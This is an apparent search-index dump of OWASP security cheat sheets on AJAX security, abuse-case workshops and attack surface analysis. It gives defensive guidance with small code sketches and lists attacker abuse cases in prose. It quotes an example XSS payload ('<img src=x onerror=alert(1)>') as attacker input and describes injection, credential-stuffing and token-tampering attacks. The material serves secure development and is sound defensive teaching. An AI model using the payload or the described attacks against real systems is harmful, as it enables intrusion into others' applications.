"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#client-side-javascript","title":"Client Side (JavaScript)","text":""},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#use-innertext-instead-of-innerhtml","title":"Use .innerText instead of .innerHTML","text":"

The use of .innerText will prevent most XSS problems as it will automatically encode the text.
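
For example, a minimal sketch (TypeScript/DOM; the element id and the query parameter are illustrative):

// Attacker-controlled input, e.g. taken from the URL query string
const userComment = new URLSearchParams(location.search).get("comment") ?? "";
const out = document.getElementById("comment")!; // assumes an element with id="comment" exists
out.innerHTML = userComment;  // unsafe: markup such as <img src=x onerror=...> would execute
out.innerText = userComment;  // safer: the value is treated as plain text, not parsed as HTML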

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#dont-use-eval-new-function-or-other-code-evaluation-tools","title":"Don't use eval(), new Function() or other code evaluation tools","text":"

The eval() function is evil; never use it. Needing to use eval() usually indicates a problem in your design.
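
A common case is parsing JSON received from the server; a minimal sketch of the safe alternative (the /api/data endpoint is hypothetical):

const response = await fetch("/api/data"); // hypothetical endpoint
const responseText = await response.text();
// Unsafe: eval would execute any JavaScript embedded in the response
// const data = eval("(" + responseText + ")");
// Safe: JSON.parse only accepts valid JSON and never executes code
const data = JSON.parse(responseText);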

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#canonicalize-data-to-consumer-read-encode-before-use","title":"Canonicalize data to consumer (read: encode before use)","text":"

When using data to build HTML, script, CSS, XML, JSON, etc. make sure you take into account how that data must be presented in a literal sense to keep its logical meaning.

Data should be properly encoded before being used in this manner to prevent injection-style issues, and to make sure the logical meaning is preserved.

Check out the OWASP Java Encoder Project.
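
For client-side JavaScript/TypeScript, a minimal sketch of HTML entity encoding (hand-rolled only for illustration; in practice prefer a maintained encoder such as the project above):

// Encode the characters that are significant in an HTML context
function encodeForHtml(value: string): string {
  return value
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

const untrustedName = '<img src=x onerror=alert(1)>'; // example attacker input
// The encoded value keeps its logical meaning but is displayed literally
document.body.innerHTML = `<p>${encodeForHtml(untrustedName)}</p>`;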

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#dont-rely-on-client-logic-for-security","title":"Don't rely on client logic for security","text":"

Don't forget that the user controls the client-side logic. A number of browser plugins are available to set breakpoints, skip code, change values, etc. Never rely on client logic for security.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#dont-rely-on-client-business-logic","title":"Don't rely on client business logic","text":"

Just like the security logic, make sure any important business rules/logic are duplicated on the server side, lest a user bypass needed logic and do something silly, or worse, costly.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#avoid-writing-serialization-code","title":"Avoid writing serialization code","text":"

This is hard and even a small mistake can cause large security issues. There are already a lot of frameworks to provide this functionality.

Take a look at the JSON page for links.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#avoid-building-xml-or-json-dynamically","title":"Avoid building XML or JSON dynamically","text":"

Just like building HTML or SQL by hand, dynamic construction will cause XML injection bugs, so stay away from this, or at least use an encoding library or a safe JSON or XML library to make attributes and element data safe.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#never-transmit-secrets-to-the-client","title":"Never transmit secrets to the client","text":"

Anything the client knows the user will also know, so keep all that secret stuff on the server please.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#dont-perform-encryption-in-client-side-code","title":"Don't perform encryption in client side code","text":"

Use TLS/SSL and encrypt on the server!

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#dont-perform-security-impacting-logic-on-client-side","title":"Don't perform security impacting logic on client side","text":"

This is the overall one that gets me out of trouble in case I missed something :)

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#server-side","title":"Server Side","text":""},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#use-csrf-protection","title":"Use CSRF Protection","text":"

Take a look at the Cross-Site Request Forgery (CSRF) Prevention cheat sheet.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#protect-against-json-hijacking-for-older-browsers","title":"Protect against JSON Hijacking for Older Browsers","text":""},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#review-angularjs-json-hijacking-defense-mechanism","title":"Review AngularJS JSON Hijacking Defense Mechanism","text":"

See the JSON Vulnerability Protection section of the AngularJS documentation.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#always-return-json-with-an-object-on-the-outside","title":"Always return JSON with an Object on the outside","text":"

Always have the outside primitive be an object for JSON strings:

Exploitable:

[{\"object\": \"inside an array\"}]\n

Not exploitable:

{\"object\": \"not inside an array\"}\n

Also not exploitable:

{\"result\": [{\"object\": \"inside an array\"}]}\n
"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#avoid-writing-serialization-code-server-side","title":"Avoid writing serialization code Server Side","text":"

Remember ref vs. value types! Look for an existing library that has been reviewed.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#services-can-be-called-by-users-directly","title":"Services can be called by users directly","text":"

Even though you only expect your AJAX client-side code to call those services, users can call them directly too.

Make sure you validate inputs and treat them like they are under user control (because they are!).

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#avoid-building-xml-or-json-by-hand-use-the-framework","title":"Avoid building XML or JSON by hand, use the framework","text":"

Use the framework and be safe; build it by hand and you will have security issues.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#use-json-and-xml-schema-for-webservices","title":"Use JSON And XML Schema for Webservices","text":"

You need to use a third-party library to validate web services.
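
A minimal sketch (assuming a Node.js/TypeScript service and the Ajv JSON Schema library; the payload shape is hypothetical):

import Ajv from "ajv";

const ajv = new Ajv();
const orderSchema = {
  type: "object",
  properties: {
    productId: { type: "string", maxLength: 36 },
    quantity: { type: "integer", minimum: 1, maximum: 100 },
  },
  required: ["productId", "quantity"],
  additionalProperties: false, // reject unexpected fields
};
const validateOrder = ajv.compile(orderSchema);

function handleOrder(payload: unknown): void {
  if (!validateOrder(payload)) {
    throw new Error("Invalid request"); // reject before any business logic runs
  }
  // ...safe to use the validated payload here
}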

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html","title":"Abuse Case Cheat Sheet","text":""},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Often when the security level of an application is mentioned in requirements, the following expressions are met:

These security requirements are too generic, and thus useless for a development team...

In order to build a secure application, from a pragmatic point of view, it is important to identify the attacks which the application must defend against, according to its business and technical context.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#objective","title":"Objective","text":"

The objective of this cheat sheet is to provide an explanation of what an Abuse Case is, why abuse cases are important when considering the security of an application, and finally to provide a proposal for a pragmatic approach to building a list of abuse cases and tracking them for every feature planned for implementation as part of an application. The cheat sheet may be used for this purpose regardless of the project methodology used (waterfall or agile).

Important note about this Cheat Sheet:

The main objective is to provide a pragmatic approach in order to allow a company or a project team\nto start building and handling the list of abuse cases and then customize the elements\nproposed to its context/culture in order to, finally, build its own method.\n\nThis cheat sheet can be seen as a getting-started tutorial.\n
"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#context-approach","title":"Context & approach","text":""},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#why-clearly-identify-the-attacks","title":"Why clearly identify the attacks","text":"

Clearly identifying the attacks against which the application must defend is essential in order to enable the following steps in a project or sprint:

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#notion-of-abuse-case","title":"Notion of Abuse Case","text":"

In order to help build the list of attacks, the notion of Abuse Cases is helpful.

An Abuse Case can be defined as:

A way to use a feature that was not expected by the implementer,\nallowing an attacker to influence the feature or outcome of use of\nthe feature based on the attacker action (or input).\n

Synopsys defines an Abuse Case like this:

Misuse and abuse cases describe how users misuse or exploit the weaknesses\nof controls in software features to attack an application.\n\nThis can lead to tangible business impact when a direct attack against\nbusiness functionalities, which may bring in revenue or provide\npositive user experience, are attacked.\n\nAbuse cases can also be an effective way to drive security requirements\nthat lead to proper protection of these critical business use cases.\n

Synopsys source

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#how-to-define-the-list-of-abuse-cases","title":"How to define the list of Abuse Cases","text":"

There are many different ways to define the list of abuse cases for a feature (that can be mapped to a user story in agile projects).

The OWASP Open SAMM project proposes the following approach in Stream B of the Security Practice Requirements-Driven Testing for Maturity Level 2:

Misuse and abuse cases describe unintended and malicious use scenarios of the application, describing how an attacker could do this. Create misuse and abuse cases to misuse or exploit the weaknesses of controls in software features to attack an application. Use abuse-case models for an application to serve as fuel for identification of concrete security tests that directly or indirectly exploit the abuse scenarios.\n\nAbuse of functionality, sometimes referred to as a \u201cbusiness logic attack\u201d, depends on the design and implementation of application functions and features. An example is using a password reset flow to enumerate accounts. As part of business logic testing, identify the business rules that are important for the application and turn them into experiments to verify whether the application properly enforces the business rule. For example, on a stock trading application, is the attacker allowed to start a trade at the beginning of the day and lock in a price, hold the transaction open until the end of the day, then complete the sale if the stock price has risen or cancel if the price dropped?\n

Open SAMM source: Verification Requirement Driven Testing Stream B

Another way to build the list (more bottom-up and collaboratively oriented) can be the following:

Hold a workshop that includes people with the following profiles:

During this workshop (duration will depend on the size of the feature list, but 4 hours is a good start) all business features that will be part of the project or the sprint will be processed. The output of the workshop will be a list of attacks (abuse cases) for all business features. All abuse cases will have a risk rating that allows for filtering and prioritization.

It is important to take into account both Technical and Business kinds of abuse cases and mark them accordingly.

Example:

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#when-to-define-the-list-of-abuse-cases","title":"When to define the list of Abuse Cases","text":"

In agile projects, the definition workshop must be held after the meeting in which User Stories are included in a Sprint.

In waterfall projects, the definition workshop must be held once the business features to implement have been identified and are known to the business.

Whatever the project methodology used (agile or waterfall), the abuse cases selected to be addressed must become security requirements in each feature specification section (waterfall) or User Story acceptance criteria (agile) in order to allow additional cost/effort evaluation, identification and implementation of the countermeasures.

Each abuse case must have a unique identifier in order to allow tracking throughout the whole project/sprint (details about this point will be given in the proposal section).

An example of unique ID format can be ABUSE_CASE_001.

The following figure provides an overview of the chaining of the different steps involved (from left to right):

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#proposal","title":"Proposal","text":"

The proposal will focus on the output of the workshop explained in the previous section.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#step-1-preparation-of-the-workshop","title":"Step 1: Preparation of the workshop","text":"

First, even if it seems obvious, the key business people must be sure to know, understand and be able to explain the business features that will be processed during the workshop.

Secondly, create a new Microsoft Excel file (you can also use Google Sheets or any other similar software) with the following sheets (or tabs):

This is the representation of each sheet along with an example of content that will be filled during the workshop:

FEATURES sheet:

| Feature unique ID | Feature name | Feature short description |
|---|---|---|
| FEATURE_001 | DocumentUploadFeature | Allow user to upload a document along with a message |

COUNTERMEASURES sheet:

| Countermeasure unique ID | Countermeasure short description | Countermeasure help/hint |
|---|---|---|
| DEFENSE_001 | Validate the uploaded file by loading it into a parser | Use advice from the OWASP Cheat Sheet about file upload |

ABUSE CASES sheet:

| Abuse case unique ID | Feature ID impacted | Abuse case's attack description | Attack referential ID (if applicable) | CVSS V3 risk rating (score) | CVSS V3 string | Kind of abuse case | Countermeasure ID applicable | Handling decision (To Address or Risk Accepted) |
|---|---|---|---|---|---|---|---|---|
| ABUSE_CASE_001 | FEATURE_001 | Upload Office file with malicious macro in charge of dropping a malware | CAPEC-17 | HIGH (7.7) | CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:H/A:H | Technical | DEFENSE_001 | To Address |
"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#step-2-during-the-workshop","title":"Step 2: During the workshop","text":"

Use the spreadsheet to review all the features.

For each feature, follow this flow:

  1. Key business people explain the current feature from a business point of view.
  2. Penetration testers propose and explain a set of attacks that they can perform against the feature.
  3. For each attack proposed:

    1. AppSec proposes a countermeasure and a preferred setup location (infrastructure, network, code, design...).
    2. Technical people give feedback about the feasibility of the proposed countermeasure.
    3. Penetration testers use the CVSS v3 (or another standard) calculator to determine a risk rating (e.g. the CVSS V3 calculator).
    4. Risk key people accept/increase/decrease the rating to arrive at a final rating that matches the real business impact for the company.
  4. Business, Risk and Technical key people reach a consensus and filter the list of abuse cases for the current feature to keep the ones that must be addressed, and then flag them accordingly in the ABUSE CASES sheet (if a risk is accepted, then add a comment to explain why).

  5. Move on to the next feature...

If penetration testers cannot be present, then you can use the following references to identify the attacks applicable to your features:

Important note on attacks and countermeasure knowledge base(s):

Over time and across projects, you will build your own dictionary of attacks and countermeasures\nthat are applicable to the kind of applications in your business domain.\n\nThis dictionary will speed up future workshops in a significant way.\n\nTo promote the creation of this dictionary, you can, at the end of the project/sprint, gather the list\nof attacks and countermeasures identified in a central location (wiki, database, file...) that will be\nused during the next workshop in combination with input from penetration testers.\n
"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#step-3-after-the-workshop","title":"Step 3: After the workshop","text":"

The spreadsheet contains (at this stage) the list of all abuse cases that must be handled and, potentially (depending on capacity), the corresponding countermeasures.

Now, there are two remaining tasks:

  1. Key business people must update the specification of each feature (waterfall) or the User Story of each feature (agile) to include the associated abuse cases as Security Requirements (waterfall) or Acceptance Criteria (agile).
  2. Key technical people must evaluate the overhead in terms of cost/effort needed to implement the countermeasure.
"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#step-4-during-implementation-abuse-cases-handling-tracking","title":"Step 4: During implementation - Abuse cases handling tracking","text":"

In order to track the handling of all the abuse cases, the following approach can be used:

If one or several abuse cases are handled at:

In this way, it becomes possible (via some minor scripting, as sketched below) to identify where abuse cases are addressed.
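
For example, a small hypothetical script (TypeScript/Node.js) that scans a source tree for ABUSE_CASE_ identifiers referenced in comments or annotations:

import { readdirSync, readFileSync, statSync } from "fs";
import { join } from "path";

// Walk a source tree and record which files reference which abuse case IDs
function findAbuseCaseRefs(dir: string, refs = new Map<string, string[]>()): Map<string, string[]> {
  for (const entry of readdirSync(dir)) {
    const path = join(dir, entry);
    if (statSync(path).isDirectory()) {
      findAbuseCaseRefs(path, refs);
      continue;
    }
    const matches = readFileSync(path, "utf8").match(/ABUSE_CASE_\d+/g) ?? [];
    for (const id of matches) {
      refs.set(id, [...(refs.get(id) ?? []), path]);
    }
  }
  return refs;
}

for (const [id, files] of findAbuseCaseRefs("./src")) {
  console.log(`${id} is handled in: ${files.join(", ")}`);
}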

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#step-5-during-implementation-abuse-cases-handling-validation","title":"Step 5: During implementation - Abuse cases handling validation","text":"

As abuse cases are defined, it is possible to put in place automated or manual validations to ensure that:

Validations can be of the following kinds:

Adding automated tests also allows teams to track that countermeasures against the abuse cases are still effective/in place during a maintenance or bug fixing phase of a project (to prevent accidental removal/disabling). It is also useful when a Continuous Delivery approach is used, to ensure that all abuse cases protections are in place before opening access to the application.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#example-of-derivation-of-abuse-cases-as-user-stories","title":"Example of derivation of Abuse Cases as User Stories","text":"

The following section shows an example of deriving Abuse Cases as User Stories, here using the OWASP Top 10 as the input source.

Threat Oriented Personas:

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a12017-injection","title":"A1:2017-Injection","text":"

Epic:

Almost any source of data can be an injection vector: environment variables, parameters, external and internal web services, and all types of users. Injection flaws occur when an attacker can send hostile data to an interpreter.

Abuse Case:

As an attacker, I will perform an injection attack (SQL, LDAP, XPath, or NoSQL queries, OS commands, XML parsers, SMTP headers, expression languages, and ORM queries) against input fields of the User or API interfaces.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a22017-broken-authentication","title":"A2:2017-Broken Authentication","text":"

Epic:

Attackers have access to hundreds of millions of valid username and password combinations for credential stuffing, default administrative account lists, automated brute force, and dictionary attack tools. Session management attacks are well understood, particularly in relation to unexpired session tokens.

Abuse Case:

As an attacker, I have access to hundreds of millions of valid username and password combinations for credential stuffing.

Abuse Case:

As an attacker, I have default administrative account lists, automated brute force, and dictionary attack tools I use against login areas of the application and support systems.

Abuse Case:

As an attacker, I manipulate session tokens using expired and fake tokens to gain access.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a32017-sensitive-data-exposure","title":"A3:2017-Sensitive Data Exposure","text":"

Epic:

Rather than directly attacking crypto, attackers steal keys, execute man-in-the-middle attacks, or steal clear text data off the server, while in transit, or from the user's client, e.g. browser. A manual attack is generally required. Previously retrieved password databases could be brute forced by Graphics Processing Units (GPUs).

Abuse Case:

As an attacker, I steal keys that were exposed in the application to get unauthorized access to the application or system.

Abuse Case:

As an attacker, I execute man-in-the-middle attacks to get access to traffic and leverage it to obtain sensitive data and possibly get unauthorized access to the application.

Abuse Case:

As an attacker, I steal clear text data off the server, while in transit, or from the user's client, e.g. browser to get unauthorized access to the application or system.

Abuse Case:

As an attacker, I find and target old or weak cryptographic algorithms by capturing traffic and breaking the encryption.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a42017-xml-external-entities-xxe","title":"A4:2017-XML External Entities (XXE)","text":"

Epic:

Attackers can exploit vulnerable XML processors if they can upload XML or include hostile content in an XML document, exploiting vulnerable code, dependencies or integrations.

Abuse Case:

As an attacker, I exploit vulnerable areas of the application where the user or system can upload XML to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, as well as execute other attacks.

Abuse Case:

As an attacker, I include hostile content in an XML document which is uploaded to the application or system to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, as well as execute other attacks.

Abuse Case:

As an attacker, I include malicious XML code to exploit vulnerable code, dependencies or integrations to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack (e.g. Billion Laughs attack), as well as execute other attacks.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a52017-broken-access-control","title":"A5:2017-Broken Access Control","text":"

Epic:

Exploitation of access control is a core skill of attackers. Access control is detectable using manual means, or possibly through automation for the absence of access controls in certain frameworks.

Abuse Case:

As an attacker, I bypass access control checks by modifying the URL, internal application state, or the HTML page, or simply using a custom API attack tool.

Abuse Case:

As an attacker, I manipulate the primary key and change it to access another user's record, allowing viewing or editing of someone else's account.

Abuse Case:

As an attacker, I manipulate sessions, access tokens, or other access controls in the application to act as a user without being logged in, or acting as an admin/privileged user when logged in as a user.

Abuse Case:

As an attacker, I leverage metadata manipulation, such as replaying or tampering with a JSON Web Token (JWT) access control token, manipulating a cookie or hidden field to elevate privileges, or abusing JWT invalidation.

Abuse Case:

As an attacker, I exploit Cross-Origin Resource Sharing (CORS) misconfiguration allowing unauthorized API access.

Abuse Case:

As an attacker, I force browsing to authenticated pages as an unauthenticated user or to privileged pages as a standard user.

Abuse Case:

As an attacker, I access APIs with missing access controls for POST, PUT and DELETE.

Abuse Case:

As an attacker, I target default crypto keys in use, weak crypto keys generated or re-used, or keys where rotation is missing.

Abuse Case:

As an attacker, I find areas where the user agent (e.g. app, mail client) does not verify if the received server certificate is valid and perform attacks where I get unauthorized access to data.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a62017-security-misconfiguration","title":"A6:2017-Security Misconfiguration","text":"

Epic:

Attackers will often attempt to exploit unpatched flaws or access default accounts, unused pages, unprotected files and directories, etc to gain unauthorized access or knowledge of the system.

Abuse Case:

As an attacker, I find and exploit missing appropriate security hardening configurations on any part of the application stack, or improperly configured permissions on cloud services.

Abuse Case:

As an attacker, I find unnecessary features which are enabled or installed (e.g. unnecessary ports, services, pages, accounts, or privileges) and attack or exploit the weakness.

Abuse Case:

As an attacker, I use default accounts and their passwords to access systems or interfaces, or to perform actions on components, which I should not be able to do.

Abuse Case:

As an attacker, I find areas of the application where error handling reveals stack traces or other overly informative error messages I can use for further exploitation.

Abuse Case:

As an attacker, I find areas where systems are not upgraded, or where the latest security features are disabled or not configured securely.

Abuse Case:

As an attacker, I find security settings in the application servers, application frameworks (e.g. Struts, Spring, ASP.NET), libraries, databases, etc. not set to secure values.

Abuse Case:

As an attacker, I find the server does not send security headers or directives or they are not set to secure values.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a72017-cross-site-scripting-xss","title":"A7:2017-Cross-Site Scripting (XSS)","text":"

Epic:

XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two-thirds of all applications.

Abuse Case:

As an attacker, I perform reflected XSS where the application or API includes unvalidated and unescaped user input as part of HTML output. A successful attack allows me to execute arbitrary HTML and JavaScript in my victim's browser. Typically, the victim will need to interact with a malicious link that points to an attacker-controlled page, such as malicious watering hole websites, advertisements, or similar.

Abuse Case:

As an attacker, I perform stored XSS where the application or API stores unsanitized user input that is viewed at a later time by another user or an administrator.

Abuse Case:

As an attacker, I perform DOM-based XSS against JavaScript frameworks, single-page applications, and APIs that dynamically include attacker-controllable data in a page.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a82017-insecure-deserialization","title":"A8:2017-Insecure Deserialization","text":"

Epic:

Exploitation of deserialization is somewhat difficult, as off-the-shelf exploits rarely work without changes or tweaks to the underlying exploit code.

Abuse Case:

As an attacker, I find areas of the application and APIs where hostile or tampered objects can be supplied for deserialization. As a result, I can focus on object- and data-structure-related attacks, where I modify application logic or achieve arbitrary remote code execution if there are classes available to the application that can change behavior during or after deserialization. Or I focus on data-tampering attacks, such as access-control-related attacks, where existing data structures are used but the content is changed.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a92017-using-components-with-known-vulnerabilities","title":"A9:2017-Using Components with Known Vulnerabilities","text":"

Epic:

While it is easy to find already-written exploits for many known vulnerabilities, other vulnerabilities require concentrated effort to develop a custom exploit.

Abuse Case:

As an attacker, I find common open source or closed source packages with weaknesses and perform attacks against vulnerabilities and exploits which are disclosed.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a102017-insufficient-logging-monitoring","title":"A10:2017-Insufficient Logging & Monitoring","text":"

Epic:

Exploitation of insufficient logging and monitoring is the bedrock of nearly every major incident. Attackers rely on the lack of monitoring and timely response to achieve their goals without being detected. In 2016, identifying a breach took an average of 191 days, leaving plenty of time for damage to be inflicted.

Abuse Case:

As an attacker, I attack an organization and the logs, monitoring systems, and teams do not see or respond to my attacks.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#sources-of-the-schemas","title":"Sources of the schemas","text":"

All figures were created using the https://www.draw.io/ site and exported (as PNG images) for integration into this article.

All XML descriptor files for each schema are available below (using the XML descriptor, the schema can be modified on the DRAW.IO site):

Schemas descriptors archive

"},{"location":"cheatsheets/Access_Control_Cheat_Sheet.html","title":"DEPRECATED: Access Control Cheatsheet","text":"

The Access Control cheat sheet has been deprecated.

Please visit the Authorization Cheatsheet instead.

"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html","title":"Attack Surface Analysis Cheat Sheet","text":""},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#what-is-attack-surface-analysis-and-why-is-it-important","title":"What is Attack Surface Analysis and Why is it Important","text":"

This article describes a simple and pragmatic way of doing Attack Surface Analysis and managing an application's Attack Surface. It is targeted to be used by developers to understand and manage application security risks as they design and change an application, as well as by application security specialists doing a security risk assessment. The focus here is on protecting an application from external attack - it does not take into account attacks on the users or operators of the system (e.g. malware injection, social engineering attacks), and there is less focus on insider threats, although the principles remain the same. The internal attack surface is likely to be different to the external attack surface and some users may have a lot of access.

Attack Surface Analysis is about mapping out what parts of a system need to be reviewed and tested for security vulnerabilities. The point of Attack Surface Analysis is to understand the risk areas in an application, to make developers and security specialists aware of what parts of the application are open to attack, to find ways of minimizing this, and to notice when and how the Attack Surface changes and what this means from a risk perspective.

Attack Surface Analysis is usually done by security architects and pen testers. But developers should understand and monitor the Attack Surface as they design and build and change a system.

Attack Surface Analysis helps you to:

  1. identify what functions and what parts of the system you need to review/test for security vulnerabilities
  2. identify high risk areas of code that require defense-in-depth protection - what parts of the system that you need to defend
  3. identify when you have changed the attack surface and need to do some kind of threat assessment
"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#defining-the-attack-surface-of-an-application","title":"Defining the Attack Surface of an Application","text":"

The Attack Surface describes all of the different points where an attacker could get into a system, and where they could get data out.

The Attack Surface of an application is:

  1. the sum of all paths for data/commands into and out of the application, and
  2. the code that protects these paths (including resource connection and authentication, authorization, activity logging, data validation and encoding)
  3. all valuable data used in the application, including secrets and keys, intellectual property, critical business data, personal data and PII, and
  4. the code that protects these data (including encryption and checksums, access auditing, and data integrity and operational security controls).

You overlay this model with the different types of users - roles, privilege levels - that can access the system (whether authorized or not). Complexity increases with the number of different types of users. But it is important to focus especially on the two extremes: unauthenticated, anonymous users and highly privileged admin users (e.g. database administrators, system administrators).

Group each type of attack point into buckets based on risk (external-facing or internal-facing), purpose, implementation, design and technology. You can then count the number of attack points of each type, then choose some cases for each type, and focus your review/assessment on those cases.

With this approach, you don't need to understand every endpoint in order to understand the Attack Surface and the potential risk profile of a system. Instead, you can count the different general types of endpoints and the number of points of each type. With this, you can budget what it will take to assess risk at scale, and you can tell when the risk profile of an application has significantly changed.

"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#microservice-and-cloud-native-applications","title":"Microservice and Cloud Native Applications","text":"

Microservice and Cloud Native applications are comprised of multiple smaller components, loosely coupled using APIs and independently scalable. When assessing the attack surface for applications of this architectural style, you should prioritize the components that are reachable from an attack source (e.g. external traffic from the Internet). Such components may be located behind tiers of proxies, load balancers and ingress controllers, and may auto-scale without warning.

Open source tooling such as Scope or ThreatMapper assist in visualizing the attack surface.

"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#identifying-and-mapping-the-attack-surface","title":"Identifying and Mapping the Attack Surface","text":"

You can start building a baseline description of the Attack Surface in a picture and notes. Spend a few hours reviewing design and architecture documents from an attacker's perspective. Read through the source code and identify different points of entry/exit:

The total number of different attack points can easily add up into the thousands or more. To make this manageable, break the model into different types based on function, design and technology:

You also need to identify the valuable data (e.g. confidential, sensitive, regulated) in the application, by interviewing developers and users of the system, and again by reviewing the source code.

You can also build up a picture of the Attack Surface by scanning the application. For web apps you can use a tool like the OWASP ZAP or Arachni or Skipfish or w3af or one of the many commercial dynamic testing and vulnerability scanning tools or services to crawl your app and map the parts of the application that are accessible over the web. Some web application firewalls (WAFs) may also be able to export a model of the application's entry points.

Validate and fill in your understanding of the Attack Surface by walking through some of the main use cases in the system: signing up and creating a user profile, logging in, searching for an item, placing an order, changing an order, and so on. Follow the flow of control and data through the system, see how information is validated and where it is stored, what resources are touched and what other systems are involved. There is a recursive relationship between Attack Surface Analysis and Application Threat Modeling: changes to the Attack Surface should trigger threat modeling, and threat modeling helps you to understand the Attack Surface of the application.

The Attack Surface model may be rough and incomplete to start, especially if you haven't done any security work on the application before. Fill in the holes as you dig deeper in a security analysis, or as you work more with the application and realize that your understanding of the Attack Surface has improved.

"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#measuring-and-assessing-the-attack-surface","title":"Measuring and Assessing the Attack Surface","text":"

Once you have a map of the Attack Surface, identify the high risk areas. Focus on remote entry points \u2013 interfaces with outside systems and to the Internet \u2013 and especially where the system allows anonymous, public access.

These are often where you are most exposed to attack. Then understand what compensating controls you have in place, operational controls like network firewalls and application firewalls, and intrusion detection or prevention systems to help protect your application.

Michael Howard at Microsoft and other researchers have developed a method for measuring the Attack Surface of an application, and for tracking changes to the Attack Surface over time, called the Relative Attack Surface Quotient (RSQ). Using this method, you calculate an overall attack surface score for the system, and measure this score as changes are made to the system and to how it is deployed. Researchers at Carnegie Mellon built on this work to develop a formal way to calculate an Attack Surface Metric for large systems like SAP. They calculate the Attack Surface as the sum of all entry and exit points, channels (the different ways that clients or external systems connect to the system, including TCP/UDP ports, RPC end points, named pipes...) and untrusted data elements. Then they apply a damage potential/effort ratio to these Attack Surface elements to identify high-risk areas.
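
Purely as an illustration of the idea (a toy TypeScript sketch, not the formal CMU metric; the elements and numbers are invented), a damage-potential/effort score could be computed like this:

// Each attack surface element gets a damage potential and an attacker effort estimate
interface SurfaceElement {
  name: string;
  damagePotential: number; // 1 (low) .. 10 (high)
  effort: number;          // 1 (trivial) .. 10 (very hard)
}

const elements: SurfaceElement[] = [
  { name: "anonymous HTTP endpoint", damagePotential: 9, effort: 2 },
  { name: "admin RPC channel", damagePotential: 8, effort: 6 },
  { name: "uploaded file (untrusted data)", damagePotential: 7, effort: 3 },
];

// A higher score suggests a larger relative attack surface; track it over releases
const score = elements.reduce((sum, e) => sum + e.damagePotential / e.effort, 0);
console.log(`Relative attack surface score: ${score.toFixed(2)}`);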

Note that deploying multiple versions of an application, leaving features in that are no longer used just in case they may be needed in the future, or leaving old backup copies and unused code increases the Attack Surface. Source code control and robust change management/configuration practices should be used to ensure the actual deployed Attack Surface matches the theoretical one as closely as possible.

Backups of code and data - online, and on offline media - are an important but often ignored part of a system's Attack Surface. Protecting your data and IP by writing secure software and hardening the infrastructure will all be wasted if you hand everything over to bad actors by not protecting your backups.

"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#managing-the-attack-surface","title":"Managing the Attack Surface","text":"

Once you have a baseline understanding of the Attack Surface, you can use it to incrementally identify and manage risks going forward as you make changes to the application. Ask yourself:

The first web page that you create opens up the system's Attack Surface significantly and introduces all kinds of new risks. If you add another field to that page, or another web page like it, while technically you have made the Attack Surface bigger, you haven't increased the risk profile of the application in a meaningful way. Each of these incremental changes is more of the same, unless you follow a new design or use a new framework.

